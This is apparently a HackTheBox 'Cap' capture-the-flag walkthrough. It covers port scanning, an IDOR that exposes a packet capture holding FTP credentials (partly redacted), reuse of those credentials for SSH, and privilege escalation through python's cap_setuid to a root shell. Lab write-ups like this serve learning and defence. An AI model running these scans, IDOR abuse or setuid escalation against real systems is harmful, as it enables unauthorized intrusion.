HackTheBox - Cap

Introduction

Cap is a fun box where we find a flask web app which lets us download network log, where we find FTP and SSH credentials for user nathan.

The box has python which has capability to set UIDs, which lets us access roots shell, when UID is set to 0.

Reconnaissance

MassScan results

Masscan found 3 open ports.

sudo masscan "10.10.10.245" -p1-65535,U:1-65535 --rate=500 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-06-19 14:47:10 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 21/tcp on 10.10.10.245
Discovered open port 80/tcp on 10.10.10.245
Discovered open port 22/tcp on 10.10.10.245

NMAP Scan results

We then input the ports we got from masscan to nmap. These are port 22(ssh), 80 & 9090(http), 161(snmp).

sudo nmap -sC -sV -oN 10.10.10.245 10.10.10.245 -p 21,80,22

# Nmap 7.80 scan initiated Sat Jun 19 14:46:38 2021 as: nmap -sC -sV -oA nmap 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn

<-- Removed few lines here, as those were of no use -->

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 19 14:49:15 2021 -- 1 IP address (1 host up) scanned in 156.80 seconds

So we have:

• An FTP server running on port 21.
• A SSH server running on port 22, running on Ubuntu Linux.
• A gunicorn web server is running on port 80. Which means that we have a python application possibly flask/django (Hint: as mentioned in tweet for CAP’s launch).

Foothold

As FTP is enabled we try to login as ‘Anonymous FTP’ with credentials:
username: anonymous | password: anonymous

But that does not work.

Next, we head over to the web-server running at http://cap.htb:80/.

Here we have a dashboard with user “Nathan”, nothing functional though.

The dashboard has 3 urls:

- /a                               => gives an overview of 'Security Events', 'Failed Login Attempts' and 'Port Scans (Unique IPs)' in last 24 hrs
- /capture                         => gives a XX.pcap file which contains packet cap data, might be `tcpdump`
  - /data/XX (XX is 2 digit num)
- /ip                              => gives `ipconfig` output
- /netstat                         => gives `netstat` output

The /capture redirects to /data/XX (XX is 2 digit num). Through which we can download a XX.pcap file.

But here is a catch. We could visit any valid data path and download the corresponding .pcap file. IDOR here!

We visit http://cap.htb:80/data/0 and download 0.pcap file.

Then open it up with wireshark¹.

We see here an FTP login is successfull with credentials

✅ FTP user: nathan | pass: Buck██████0RM3!

We do get access for FTP and also get the user.txt flag.

Another thing is, we can login using SSH to this box as same credentials (used for FTP login) are valid!!

So we login via SSH for further enumuration using ssh nathan@cap.htb

Privilege Escalation

For getting root we run sudo -l, but we get absolutely nothing!

We upload LinEnum.sh on the box, and run it.

We get an interesting results. (Hint: Was also a sub-tweet on Cap’s tweet)

• Specifically here, cap_setuid is important!
• This allows to make arbitrary manipulations of process UIDs ²
• That iscap_setuid allows changing of the UID (user ID)

We can now set the UID to 0. That means we can run our command as a superuser ³

We already know that this box has python installed as there is a flask app running on port 80

Thus, we run the folowing commands to get a root session, and the root.txt flag.

1
2
3

import os
os.setuid(0)
os.system("/bin/bash")

And we are root!!